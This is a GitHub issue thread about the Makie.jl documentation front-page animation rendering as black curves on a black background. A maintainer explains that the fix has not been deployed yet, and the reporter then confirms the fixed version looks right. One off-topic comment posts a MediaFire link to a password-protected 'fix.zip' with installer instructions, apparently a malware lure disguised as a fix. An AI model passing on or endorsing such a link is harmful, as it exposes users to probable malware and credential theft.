### ISSUE TITLE
The hero "beautiful animation" on frontpage of website doesn't look beautiful

### ISSUE THREAD

**Issue by GregVernon** [MakieOrg/Makie.jl#4273]
The hero "beautiful animation" on [frontpage of the website](https://docs.makie.org/v0.21/#Welcome-to-Makie!) doesn't look beautiful.

![image](https://github.com/user-attachments/assets/d1025bec-7b25-40b8-ba74-f64e0c264152)

Looks like it's black curves on a black background?

**Comment by asinghvi17** [comment]
This was fixed by #4256, the dev docs work fine (deployed from master) but it looks like the new docs haven't been deployed yet for v0.21.9.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GregVernon** [comment]
@asinghvi17 -- can confirm, it is beautiful 😍 

![image](https://github.com/user-attachments/assets/8bc27029-8d35-4cff-a930-cb219e92faff)
